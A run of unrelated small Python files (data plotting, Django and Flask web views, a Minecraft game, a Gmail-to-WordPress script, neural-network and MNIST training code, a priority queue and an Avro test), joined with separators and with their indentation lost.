if path.isfile(results_file):
with open(results_file, 'rb') as f:
results_by_sd[sd] = pickle.load(f)
# If we don't already have the results, compute them
else:
# Make sure we have the explanations CSV
if not path.isfile(expl_fname):
logger.info('Skipping %s, file does not exist' % expl_fname)
else:
logger.info('Getting pairs from %s' % expl_fname)
df = pd.read_csv(expl_fname, delimiter=',')
results = main(expl_df=df, z_corr=z_cm)
results_by_sd[sd] = results
logger.info("Pickling results file %s" % results_file)
with open(results_file, 'wb') as f:
pickle.dump(results, f)
# Load _explanations_of_pairs.csv for each range
#for sd in ['1_2sd', '2_3sd', '3_4sd', '4_5sd', '5_sd', 'rnd']:
for sd in sds:
try:
results = results_by_sd[sd]
except KeyError:
logger.info("Results for %s not found in dict, skipping" % sd)
continue
# Loop the different sets:
# - axb_and_dir - subset where direct AND pathway explains
# - axb_not_dir - subset where pathway, NOT direct explans
# - all_axb - the distribution of the any explanation
for k, v in results.items():
# Plot:
# 1: all_x_corrs - the distribution of all gathered a-x,
# x-b combined z-scores
# 2: top_x_corrs - the strongest (over the a-x, x-b average)
# z-score per A-B. List contains (A, B, topx).
# 3:
for plot_type in ['all_azb_corrs', 'azb_avg_corrs', 'all_x_corrs',
'avg_x_corrs', 'top_x_corrs']:
if len(v[plot_type]) > 0:
if isinstance(v[plot_type][0], tuple):
data = [t[-1] for t in v[plot_type]]
else:
data = v[plot_type]
plt.hist(x=data, bins='auto')
plt.title('%s %s; %s' %
(plot_type.replace('_', ' ').capitalize(),
k.replace('_', ' '),
sd))
plt.xlabel('combined z-score')
plt.ylabel('count')
plt.savefig(path.join(expl_dir,
'%s_%s.png' % (plot_type, k)),
format='png')
plt.show()
else:
logger.warning('Empty result for %s (%s) in range %s'
% (k, plot_type, sd))
|
from math import sqrt
num = int(input('digite um numero: '))
if num > 0:
print(f'A raiz quadrada do numero digitado é {(sqrt(num))}, é seu quadrado é {(num ** 2)}')
|
# Written at the 2013 DC Lady Hackathon for Karen
import email, getpass, imaplib, os
import smtplib
from email.mime.text import MIMEText
user = raw_input("Enter your GMail username:")
pwd = getpass.getpass("Enter your password: ")
# connecting to the gmail imap server
m = imaplib.IMAP4_SSL("imap.gmail.com")
m.login(user,pwd)
m.select("INBOX")
# here you a can choose a mail box like INBOX instead
# use m.list() to get all the mailboxes
resp, items = m.search(None, 'SUBJECT', '"Re: A Quote to Share, and other things"')
# you could filter using the IMAP rules here
# (check http://www.example-code.com/csharp/imap-search-critera.asp)
# resp is response code from server. it prints "Ok"
items = items[0].split() # getting the mails id
for emailid in items:
resp, data = m.fetch(emailid, "(RFC822)")
# fetching the mail, "`(RFC822)`" means "get the whole stuff", but you can ask for headers only, etc
email_body = data[0][1] # getting the mail content
mail = email.message_from_string(email_body)
# we use walk to create a generator so we can iterate on the parts
# and forget about the recursive headache
for part in mail.walk():
# multipart are just containers, so we skip them
if part.get_content_type() == 'text/plain':
fullmsg=part.get_payload()
qs=0
for (counter,line) in enumerate(fullmsg):
if line == "<":
qs=counter
break
text=fullmsg[0:qs]
index_of_colon = text.rfind(":", 0, qs)
quote = text[0:index_of_colon-25]
msg=MIMEText(quote)
msg['Subject']=mail["From"]
msg['From'] = 'xxx@gmail.com'
msg['To'] = 'xxx@post.wordpress.com'
s = smtplib.SMTP('smtp.gmail.com')
server = smtplib.SMTP('smtp.gmail.com',587) #port 465 or 587
server.ehlo()
server.starttls()
server.ehlo()
server.login(user,pwd)
server.sendmail('xxx@gmail.com','xxx@post.wordpress.com',msg.as_string())
server.close()
|
#import the minecraft modules
import mcpi.minecraft as minecraft
import mcpi.block as block
#import random so you can create lights in random locations
import random
#import time so we can put delays into our program
import time
#create the connection
mc = minecraft.Minecraft.create()
mc.postToChat("Minecraft Whac-a-Block")
#get the position of the player
pos = mc.player.getTilePos()
#build the game board
mc.setBlocks(pos.x - 1, pos.y, pos.z + 3,
pos.x + 1, pos.y + 2, pos.z + 3,
block.STONE.id)
#post a message for the player
mc.postToChat("Get ready ...")
time.sleep(5)
mc.postToChat("Go")
#setup the variables
#how many blocks are lit
blocksLit = 0
#how many points has the player scored
points = 0
#loop until game over (when all the lights are lit)
while blocksLit < 9:
#sleep for a small amount of time
time.sleep(0.2)
#turn off any lights which have been hit
for hitBlock in mc.events.pollBlockHits():
#was the block hit glowstone
if mc.getBlock(hitBlock.pos.x, hitBlock.pos.y, hitBlock.pos.z) == block.GLOWSTONE_BLOCK.id:
#if it was, turn it back to STONE
mc.setBlock(hitBlock.pos.x, hitBlock.pos.y, hitBlock.pos.z, block.STONE.id)
#reduce the number of lights lit
blocksLit = blocksLit - 1
#increase the points
points = points + 1
#increase the number of lights lit
blocksLit = blocksLit + 1
#create the next light
lightCreated = False
while not lightCreated:
xPos = pos.x + random.randint(-1,1)
yPos = pos.y + random.randint(0,2)
zPos = pos.z + 3
#if the block is already glowstone, return to the top and try again
# otherwise set it to the
if mc.getBlock(xPos, yPos, zPos) == block.STONE.id:
#set the block to glowstone
mc.setBlock(xPos, yPos, zPos, block.GLOWSTONE_BLOCK.id)
lightCreated = True
#debug
#print "light created x{} y{} z{}".format(xPos, yPos, zPos)
#display the points scored to the player
mc.postToChat("Game Over - points = " + str(points))
|
#!/usr/bin/env python
import sys
import factor
from math import sqrt
def is_perfsq(n):
if n < 0:
return False
rn = sqrt(n)
if rn == int(rn):
return True
return False
def check(a, b, c):
if not is_perfsq(c - b) or \
not is_perfsq(c + b) or \
not is_perfsq(c - a) or \
not is_perfsq(c + a) or \
not is_perfsq(b - a) or \
not is_perfsq(b + a):
return False
return True
def main():
t_max = int(sys.argv[1])
t = 1
while t <= t_max:
s = t + 1
while s <= t_max:
if (s % 2 == 0 or t % 2 == 0) and factor.gcd(s, t) == 1:
ba = s * s - t * t
bb = 2 * s * t
bc = s * s + t * t
if ba > bb:
ba, bb = bb, ba
k = 1
while k <= t_max:
a = k * ba
b = k * bb
c = k * bc
if check(a, b, c):
print(a, b, c, ":", c - a, c - b, b - a, c + a, c + b, b + c)
k += 1
s += 1
t += 1
if __name__ == "__main__":
main()
|
from django.shortcuts import render
from django.views import View
from .models import HashTag
class HashTagView(View):
def get(self, request, hashtag, *args, **kwargs):
hashtag = HashTag.objects.get(tag=hashtag)
posts = hashtag.get_posts()
return render(request, "hashtags/tag_page.html", {"hashtag": hashtag, "posts": posts})
|
from flask import flash
from mongoengine.errors import DoesNotExist, NotUniqueError
from weltcharity import bcrypt
from ..models import User, ContactInfo, Address
class UserFactory():
"""UserFactory handles multiple methods of creating a user or
logging a user in.
"""
@staticmethod
def get_user_info_by_id(id):
'''Simple method that attempts to sign the user in via their
string representation of their id.
:param id: User's id.
'''
try:
user = User.objects.get(id=id)
except DoesNotExist:
flash("Error: Failed to access your user information, please logout and try again. Sorry for the inconvenience.", category="warning")
else:
return user
@staticmethod
def log_user_in(username_or_email, password):
'''Attempts to log the user in by their email first and if
it fails will revert to the username.
:param username_or_email: User's submitted username or email.
:param password: User's submitted password.
'''
try:
user = User.objects.get(email=username_or_email)
except DoesNotExist:
try:
user = User.objects.get(username=username_or_email)
except DoesNotExist:
return False
if bcrypt.check_password_hash(user.password, password):
return user
@staticmethod
def register_user(username, email, password):
'''Attempts to register the user, if the user has submitted
a unique username and email address. By the time we get to this
point we have already validated our form data.
:param username: User's submitted username
:param email: User's submitted email address
:param password: User's submitted password
'''
try:
user = User(username=username, email=email, password=password).encrypt_password()
# Here we will set up the defaults for contact_info and address. This makes settings
# changes a lot easier.
user.contact_info = [ContactInfo()]
user.contact_info[0].address = [Address()]
user.save()
except NotUniqueError:
return False
else:
return user
|
# looping through a sequence of numbers using range() method
# range(5) will generate [0,1,2,3,4]
for i in range(8):
print(i)
|
from django.urls import path, include
from . import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('', views.BranoListView.as_view(), name='sanremo-brani'),
path('brani/<int:pk>', views.BranoDetailView.as_view(), name='sanremo-brano'),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
# Add Django site authentication urls (for login, logout, password management)
urlpatterns += [
path('accounts/', include('django.contrib.auth.urls')),
]
urlpatterns += [
path('brani/<int:pk>/vota/', views.vota_brano, name='vota-brano'),
]
urlpatterns += [
path('register/', views.registrati, name='registrati')
] |
import pandas as pd
from docx import Document
import datetime
import os
import math
# remember to relabel the CITY/STATE columns in the excel sheet - they are backwards
# ADDRESS LINE 2 has a SPACE in front of it
currYear = datetime.date.today().strftime("%Y")
currMonth = datetime.date.today().strftime("%m")
def is_odd(a):
return bool(a & 1)
# https://github.com/python-openxml/python-docx/issues/33#issuecomment-77661907
# erases the extra paragraph in the table making it take more space
def delete_paragraph(paragraph):
p = paragraph._element
p.getparent().remove(p)
p._p = p._element = None
#spit out a word doc
def create_word_doc(specialties, dataFrame, headerOfFile):
# create word document
document = Document()
document.add_heading(headerOfFile, 0)
for specialty in specialties:
physicians = dataFrame[dataFrame.SPECIALTY1 == specialty]
# get rid of empty fields and fill w/ empty string
physicians = physicians.fillna('')
document.add_heading(specialty, 1)
# find out how many rows I need as an integer; add an extra row if # is odd
rowCount = physicians.shape[0] # gives number of rows in this dataframe
rowNum: int = int(math.ceil(rowCount / 2))
# add table (rows, columns)
table = document.add_table(rowNum, 2)
currColumn = 0
currRow = 0
for index, row in physicians.iterrows():
physicianName = row['LAST NAME'] + ", " + row['FIRST NAME'] + " " + row['TITLE']
officeAddress = row['ADDRESS LINE1'] + " " + row[' ADDRESS LINE 2'] + "\n" + row['CITY'] + ', ' + row[
'STATE'] + ' ' + str(row['ZIP'])
officePhone = row['OFFICE PHONE']
officeFax = row['OFFICE FAX']
cell = table.cell(currRow, currColumn)
delete_paragraph(cell.paragraphs[-1])
p = cell.add_paragraph()
p.add_run(physicianName + "\n").bold = True
p.add_run(officeAddress + "\n")
p.add_run("Office Phone: " + officePhone + "\n")
p.add_run("Office Fax: " + officeFax)
if is_odd(currColumn):
currColumn = 0
currRow = currRow + 1
else:
currColumn = 1
document.add_paragraph('Get the most up to date information and schedule an appointment online: https://www.johnmuirhealth.com/fad/')
fileName = headerOfFile + '.docx'
filePath = os.path.join('worddoc', fileName)
document.save(filePath)
# don't specify sheet name so can just get the 1st
excelSheet = pd.read_excel('jmdirectory2018.xls', index_col=None, na_values=['NA'])
# drop e-mail column; Note: axis=1 denotes that we are referring to a column, not a row
excelSheet = excelSheet.drop('EMAIL ADDRESS', axis=1)
# remove rows containing PAs, certified nursing midwife, NP
titlesToRemove = ('PA', 'PA-C', 'CNM', 'NP', 'RN', 'RNFA')
for title in titlesToRemove:
excelSheet = excelSheet[excelSheet.TITLE != title]
#combine specialties that should show up together
thoracicSpecialities = ('Cardiac Surgery', 'Cardiothoracic Surgery', 'Thoracic Surgery')
cardiologySubSpecialities = ('Cardiology', 'Cardiac Electrophysiology', 'Interventional Cardiology')
ophthoSubSpecialties = ('Ophthalmology', 'Oculoplastic Surgery', 'Retinal Ophthalmology')
surgerySubSpecialties = ('General Surgery', 'Colon and Rectal Surgery')
obSubSpecialties = ('Obstetrics and Gynecology', 'Perinatology', 'Gynecologic Oncology', 'Gynecology', 'Obstetrics', 'Reproductive Endocrinology and Infertility')
# carve out pediatric subspecialties note the space after Pediatric which will collect Peds cards, etc.
pediatricSubspecialities = excelSheet[excelSheet.SPECIALTY1.str.contains("Pediatric ") == 1][
'SPECIALTY1'].drop_duplicates()
create_word_doc(thoracicSpecialities, excelSheet, "John Muir - Thoracic & Cardiothoracic Surgery")
create_word_doc(cardiologySubSpecialities, excelSheet, 'John Muir - Cardiology')
create_word_doc(ophthoSubSpecialties, excelSheet, "John Muir - Ophthalmology")
create_word_doc(surgerySubSpecialties, excelSheet, 'John Muir - General Surgery and Colorectal Surgery')
create_word_doc(obSubSpecialties, excelSheet, 'John Muir - OB-GYN and Gyn-Onc')
create_word_doc(pediatricSubspecialities, excelSheet, 'John Muir - Pediatric Specialties')
specialtiesToRemove = ('Addiction Specialist',
'Anesthesiology',
'Cardiac Anesthesiology',
'Dentistry',
'Diagnostic Radiology',
'Emergency Medicine',
'Gastroenterology (Hospital-Based Only)',
'General Surgery-Surgical Assist',
'Hospitalist',
'Hyperbaric Medicine',
'Neonatology',
'Nurse Practitioner - Breast Health',
'Nurse Practitioner - Palliative Care',
'Palliative Care',
'Pathology',
'Pediatric Hospitalist',
'Pediatric Radiology',
'Perioperative Medicine',
'Physician Assistant - Orthopedic',
'Registered Nurse First Assist (RNFA)',
'Spine Specialist',
'Surgical Assistant',
'Teleradiology',
'Urgent Care Provider')
#remove all the specialties I've already made lists of
specialtiesToRemove = specialtiesToRemove + thoracicSpecialities + cardiologySubSpecialities + ophthoSubSpecialties + surgerySubSpecialties + obSubSpecialties
for specialty in specialtiesToRemove:
excelSheet = excelSheet[excelSheet.SPECIALTY1 != specialty]
# cuts out all the pediatric subspecialists + duplicates
specialties = excelSheet[excelSheet.SPECIALTY1.str.contains("Pediatric ") == 0]['SPECIALTY1'].drop_duplicates()
for specialty in specialties:
# list all physician of X specialty
physicians = excelSheet[excelSheet.SPECIALTY1 == specialty]
# get rid of empty fields
physicians = physicians.fillna('')
# create new word document
document = Document()
document.add_heading('John Muir - ' + specialty, 0)
# find out how many rows I need as an integer; add an extra row if # is odd
rowCount = physicians.shape[0] # gives number of rows in this dataframe
rowNum = int(math.ceil(rowCount / 2))
# add table (rows, columns)
table = document.add_table(rowNum, 2)
currColumn = 0
currRow = 0
for index, row in physicians.iterrows():
physicianName = row['LAST NAME'] + ", " + row['FIRST NAME'] + " " + row['TITLE']
officeAddress = row['ADDRESS LINE1'] + " " + row[' ADDRESS LINE 2'] + "\n" + row['CITY'] + ', ' + row[
'STATE'] + ' ' + str(row['ZIP'])
officePhone = row['OFFICE PHONE']
officeFax = row['OFFICE FAX']
cell = table.cell(currRow, currColumn)
delete_paragraph(cell.paragraphs[-1])
p = cell.add_paragraph()
p.add_run(physicianName + "\n").bold = True
p.add_run(officeAddress + "\n")
p.add_run("Office Phone: " + officePhone + "\n")
p.add_run("Office Fax: " + officeFax)
if is_odd(currColumn):
currColumn = 0
currRow = currRow + 1
else:
currColumn = 1
document.add_paragraph('Get the most up to date information and schedule an appointment online: https://www.johnmuirhealth.com/fad/')
# deal w/ heme/onc creating a new directory
specialty = specialty.replace("/", "-")
fileName = specialty + '.docx'
filePath = os.path.join('worddoc', fileName)
document.save(filePath)
# https://stackoverflow.com/questions/16476924/how-to-iterate-over-rows-in-a-dataframe-in-pandas
# deal with blank fields by making them empty strings
# https://stackoverflow.com/questions/29782898/combine-pandas-data-frame-column-values-into-new-column |
import torch
import torch.nn as nn
import torchvision.transforms as transforms
from torchvision import datasets
from torchvision.models import vgg16
import Pt_nn
from skimage.transform import resize
# Define the neural network that is used to classify images from the CIFAR10
# dataset.
class VGG16_CNN(nn.Module):
def __init__(self):
super().__init__()
# load the pretrained VGG16 network
self.vgg16 = vgg16(pretrained=True)
# dissect the network in order to get access to the feature maps of
# the convolutional layers
self.features = self.vgg16.features[:30]
# We have to add the missing max pooling operation again...
self.max_pool = self.vgg16.features[30]
# Extract the remaining layers of the VGG16 network
self.avg_pool = self.vgg16.avgpool
self.classifier = self.vgg16.classifier
# Create class variable to store the gradients
self.gradients = None
def grad_hook(self, gradients):
self.gradients = gradients
def get_feature_gradients(self, feature_layer=None):
if feature_layer is None:
return self.gradients
def get_feature_maps(self, x, feature_layer=None):
if feature_layer is None:
x = self.features(x)
return x
def forward(self, x):
x = self.get_feature_maps(x)
x.register_hook(self.grad_hook)
x = self.max_pool(x)
x = self.avg_pool(x)
x = x.view((x.shape[0], -1))
x = self.classifier(x)
return x
def load_testset(batch_size=1, normalized=True, shuffle=True):
# Use the standard normalization for ImageNet
if normalized:
transform = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
])
else:
transform = transforms.ToTensor()
testset = datasets.ImageFolder(
root='./data/ImageNet/', transform=transform)
testloader = torch.utils.data.DataLoader(
testset, batch_size=batch_size, shuffle=shuffle, num_workers=2)
return testloader
def x_gen_heatmap(imgIndx=0):
# load the model
model = VGG16_CNN()
# load the data for the heatmap generation
for i in range(imgIndx+1):
input_image, label = iter(load_testset(shuffle=False)).next()
images, labels, act_maps, pred_indcs = Pt_nn.gen_heatmap_grad(
model, input_image)
return images, labels, act_maps, pred_indcs.view(-1, pred_indcs.size(1))
def x_plot_heatmaps():
images, labels, act_maps, pred_indcs = x_gen_heatmap()
scaled_act_maps = torch.zeros([
images.size()[0], # batch dimension
act_maps.size()[1], # feature map
images.size()[2], # x-dim
images.size()[3]]) # y-dim
# scale the activation maps to the size of the original images
# and normalize the dynamic range of each image to a range of [0, 1]
for img_indx in range(act_maps.size()[0]):
for feature_indx in range(act_maps.size()[1]):
scaled_act_maps[img_indx, feature_indx, :, :] =\
torch.tensor(resize(
act_maps[img_indx, feature_indx, :, :].detach().numpy(),
images.size()[2:]))
Pt_nn.plot_heatmaps(images, labels, scaled_act_maps, pred_indcs, 5)
if __name__ == '__main__':
tl = load_testset(batch_size=1, shuffle=False)
input_image, label = iter(tl).next()
tl = load_testset(batch_size=1, normalized=False, shuffle=False)
image, _ = iter(tl).next()
image = torch.squeeze(image)
model = VGG16_CNN()
Pt_nn.gen_heatmap_grad(model, input_image, image)
|
import heapq
class PriorityQueue:
def __init__(self, data=None, key=lambda x:x):
self.empty = True
self.key = key
if data:
self._data = [(key(item), item) for item in data]
heapq.heapify(self._data)
self.empty = False
else:
self._data = []
def push(self, item):
heapq.heappush(self._data, (self.key(item), item))
self.empty = False
def pop(self):
if(len(self._data) == 0): raise Exception('queue empty !! unable to pop')
ret = heapq.heappop(self._data)[1]
if(len(self._data) == 0): self.empty = True
return ret
def top(self):
if(len(self._data) == 0): raise Exception('queue empty !! unable to top')
ret = heapq.heappop(self._data)[1]
heapq.heappush(self._data, (self.key(ret), ret))
return ret
def __len__(self):
return len(self._data)
def __str__(self):
arr = [x[1] for x in self._data]
return arr.__str__()
|
from rest_framework import generics
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from .models import BusinessUnit, Location, Role, User, Manager, Calendar, Event, CalendarSharing, Invitation
#BusinessUnit retrieve API view
class BusinessUnitRetrieveAPIView(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = BusinessUnitSerializer
def get_queryset(self):
return BusinessUnit.objects.all()
#BusinessUnit list API view
class BusinessUnitListAPIView(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = BusinessUnitSerializer
def get_queryset(self):
return BusinessUnit.objects.all()
#BusinessUnit update API view
class BusinessUnitUpdateAPIView(generics.UpdateAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = BusinessUnitSerializer
def put(self, request, *args, **kwargs):
serializer_data = request.data
serializer = BusinessUnitSerializer(
request.user, data=serializer_data, partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
#Location retrieve API view
class LocationRetrieveAPIView(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = LocationSerializer
def get_queryset(self):
return Location.objects.all()
#Location list API view
class LocationListAPIView(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = LocationSerializer
def get_queryset(self):
return Location.objects.all()
#Location update API view
class LocationUpdateAPIView(generics.UpdateAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = LocationSerializer
def put(self, request, *args, **kwargs):
serializer_data = request.data
serializer = LocationSerializer(
request.user, data=serializer_data, partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
#Role retrieve API view
class RoleRetrieveAPIView(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = RoleSerializer
def get_queryset(self):
return Role.objects.all()
#Role list API view
class RoleListAPIView(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = RoleSerializer
def get_queryset(self):
return Role.objects.all()
#Role update API view
class RoleUpdateAPIView(generics.UpdateAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = RoleSerializer
def put(self, request, *args, **kwargs):
serializer_data = request.data
serializer = RoleSerializer(
request.user, data=serializer_data, partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
#User retrieve API view
class UserRetrieveAPIView(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = UserSerializer
def get_queryset(self):
return User.objects.all()
#User list API view
class UserListAPIView(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = UserSerializer
def get_queryset(self):
return User.objects.all()
#User update API view
class UserUpdateAPIView(generics.UpdateAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = UserSerializer
def put(self, request, *args, **kwargs):
serializer_data = request.data
serializer = UserSerializer(
request.user, data=serializer_data, partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
#Manager retrieve API view
class ManagerRetrieveAPIView(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = ManagerSerializer
def get_queryset(self):
return Manager.objects.all()
#Manager list API view
class ManagerListAPIView(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = ManagerSerializer
def get_queryset(self):
return Manager.objects.all()
#Manager update API view
class ManagerUpdateAPIView(generics.UpdateAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = ManagerSerializer
def put(self, request, *args, **kwargs):
serializer_data = request.data
serializer = ManagerSerializer(
request.user, data=serializer_data, partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
#Calendar retrieve API view
class CalendarRetrieveAPIView(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = CalendarSerializer
def get_queryset(self):
return Calendar.objects.all()
#Calendar list API view
class CalendarListAPIView(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = CalendarSerializer
def get_queryset(self):
return Calendar.objects.all()
#Calendar update API view
class CalendarUpdateAPIView(generics.UpdateAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = CalendarSerializer
def put(self, request, *args, **kwargs):
serializer_data = request.data
serializer = CalendarSerializer(
request.user, data=serializer_data, partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
#Event retrieve API view
class EventRetrieveAPIView(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = EventSerializer
def get_queryset(self):
return Event.objects.all()
#Event list API view
class EventListAPIView(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = EventSerializer
def get_queryset(self):
return Event.objects.all()
#Event update API view
class EventUpdateAPIView(generics.UpdateAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = EventSerializer
def put(self, request, *args, **kwargs):
serializer_data = request.data
serializer = EventSerializer(
request.user, data=serializer_data, partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
#CalendarSharing retrieve API view
class CalendarSharingRetrieveAPIView(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = CalendarSharingSerializer
def get_queryset(self):
return CalendarSharing.objects.all()
#CalendarSharing list API view
class CalendarSharingListAPIView(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = CalendarSharingSerializer
def get_queryset(self):
return CalendarSharing.objects.all()
#CalendarSharing update API view
class CalendarSharingUpdateAPIView(generics.UpdateAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = CalendarSharingSerializer
def put(self, request, *args, **kwargs):
serializer_data = request.data
serializer = CalendarSharingSerializer(
request.user, data=serializer_data, partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
#Invitation retrieve API view
class InvitationRetrieveAPIView(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = InvitationSerializer
def get_queryset(self):
return Invitation.objects.all()
#Invitation list API view
class InvitationListAPIView(generics.ListAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = InvitationSerializer
def get_queryset(self):
return Invitation.objects.all()
#Invitation update API view
class InvitationUpdateAPIView(generics.UpdateAPIView):
permission_classes = (IsAuthenticated,)
serializer_class = InvitationSerializer
def put(self, request, *args, **kwargs):
serializer_data = request.data
serializer = InvitationSerializer(
request.user, data=serializer_data, partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
|
import torch
from torch import nn,optim
from torch.nn import functional
from torchvision import datasets,transforms
class trainer:
def __init__(self):
self.train_loader,self.test_loader = dataloaders(batch_size=32)
self.model = basicConv()
self.loss_func = nn.CrossEntropyLoss()
self.optimizer = optim.SGD(self.model.parameters(),lr=0.001, momentum=0.9)
self.epoch = 0
self.train_loss_history = []
pass
def train_iter(self,data):
# get the inputs; data is a list of [inputs, labels]
inputs, labels = data
# zero the parameter gradients
self.optimizer.zero_grad()
# forward + backward + optimize
outputs = self.model(inputs)
loss = self.model(outputs, labels)
loss.backward()
self.optimizer.step()
return loss
def validate(self):
pass
def train_epoch(self):
self.epoch +=1
running_loss = 0
for i,data in enumerate(self.train_loader):
iter_loss = self.train_iter(data)
running_loss += iter_loss
self.train_loss_history.append(running_loss)
return running_loss
def dataloaders(loc='../data',batch_size=1,shuffle=True):
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(loc, train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=batch_size, shuffle=shuffle,)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST(loc, train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=batch_size, shuffle=False,)
return train_loader,test_loader
class basicConv(nn.Module):
def __init__(self):
super(basicConv, self).__init__()
self.conv1 = nn.Conv2d(1, 32, 3, 1)
self.conv2 = nn.Conv2d(32, 64, 3, 1)
self.dropout1 = nn.Dropout2d(0.25)
self.dropout2 = nn.Dropout2d(0.5)
self.fc1 = nn.Linear(9216, 128)
self.fc2 = nn.Linear(128, 10)
def forward(self, x):
x = self.conv1(x)
x = functional.relu(x)
x = self.conv2(x)
x = functional.max_pool2d(x, 2)
x = self.dropout1(x)
x = torch.flatten(x, 1)
x = self.fc1(x)
x = functional.relu(x)
x = self.dropout2(x)
x = self.fc2(x)
output = functional.log_softmax(x, dim=1)
return output |
import csv
import requests
from lxml import html
page = requests.get('http://www.mah.gov.on.ca/page1591.aspx')
tree = html.fromstring(page.content)
muni_names = tree.xpath(
'//*[@id="content"]/div/table/tbody[2]/tr/td[1]/p/a[contains(@href, "h")]/text()'
)
muni_urls = tree.xpath(
'//*[@id="content"]/div/table/tbody[2]/tr/td[1]/p/a/@href'
)
muni_geo = None
muni_phone = None
print(len(muni_names))
print(len(muni_urls))
muni_data = list(zip(muni_names, muni_urls))
print(muni_data[-5:])
|
import logging
from glob import glob
from jinjafy import Jinjafier
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
template = "project.md"
default_meta = glob("data/meta/*.ymd") + glob("./data/meta/*.yaml")
meta = "data/projects/merck.uldir.ymd"
j = Jinjafier(template, default_meta=default_meta)
o = j.render(meta)
logging.debug(o)
|
import io
import avroc.codegen.read
import avroc.codegen.write
import fastavro.write
import fastavro.read
import fastavro._read
import pytest
import decimal
import datetime
import uuid
class testcase:
def __init__(self, label, schema, message=None, message_list=None):
self.label = label
self.schema = schema
if message_list is not None:
self.messages = message_list
else:
self.messages = []
if message is not None:
self.messages.append(message)
def assert_reader(self):
for i, m in enumerate(self.messages):
message_encoded = io.BytesIO()
fastavro.write.schemaless_writer(message_encoded, self.schema, m)
message_encoded.seek(0)
c = avroc.codegen.read.ReaderCompiler(self.schema)
reader = c.compile()
have = reader(message_encoded)
if len(self.messages) > 1:
assert have == m, f"reader behavior mismatch for message idx={i}"
else:
assert have == m, "reader behavior mismatch"
def assert_writer(self):
for i, m in enumerate(self.messages):
wc = avroc.codegen.write.WriterCompiler(self.schema)
writer = wc.compile()
encoded = writer(m)
roundtripped = fastavro.read.schemaless_reader(
io.BytesIO(encoded), self.schema
)
assert roundtripped == m
canonical_buf = io.BytesIO()
fastavro.write.schemaless_writer(canonical_buf, self.schema, m)
canonical_buf.seek(0)
canonical_encoding = canonical_buf.read()
if len(self.messages) > 1:
assert (
encoded == canonical_encoding
), f"writer byte output mismatch for message idx={i}"
else:
assert encoded == canonical_encoding, "writer byte output mismatch"
testcases = [
testcase(
label="large record",
schema={
"type": "record",
"name": "Record",
"fields": [
# Primitive types
{"type": "string", "name": "string_field"},
{"type": "int", "name": "int_field"},
{"type": "long", "name": "long_field"},
{"type": "float", "name": "float_field"},
{"type": "double", "name": "double_field"},
{"type": "boolean", "name": "boolean_field"},
{"type": "bytes", "name": "bytes_field"},
{"type": "null", "name": "null_field"},
# Array types
{
"name": "array_of_primitives",
"type": {
"type": "array",
"items": "int",
},
},
{
"name": "array_of_records",
"type": {
"type": "array",
"items": {
"type": "record",
"name": "ArrayItem",
"fields": [{"name": "array_item_field", "type": "string"}],
},
},
},
{
"name": "array_of_records_with_arrays",
"type": {
"type": "array",
"items": {
"type": "record",
"name": "ArrayItemWithSubarray",
"fields": [
{
"name": "subarray",
"type": {
"type": "array",
"items": "int",
},
},
],
},
},
},
{
"name": "array_of_maps",
"type": {
"type": "array",
"items": {"type": "map", "values": "boolean"},
},
},
# Maps
{"name": "map_of_primitives", "type": {"type": "map", "values": "int"}},
{
"name": "map_of_arrays",
"type": {
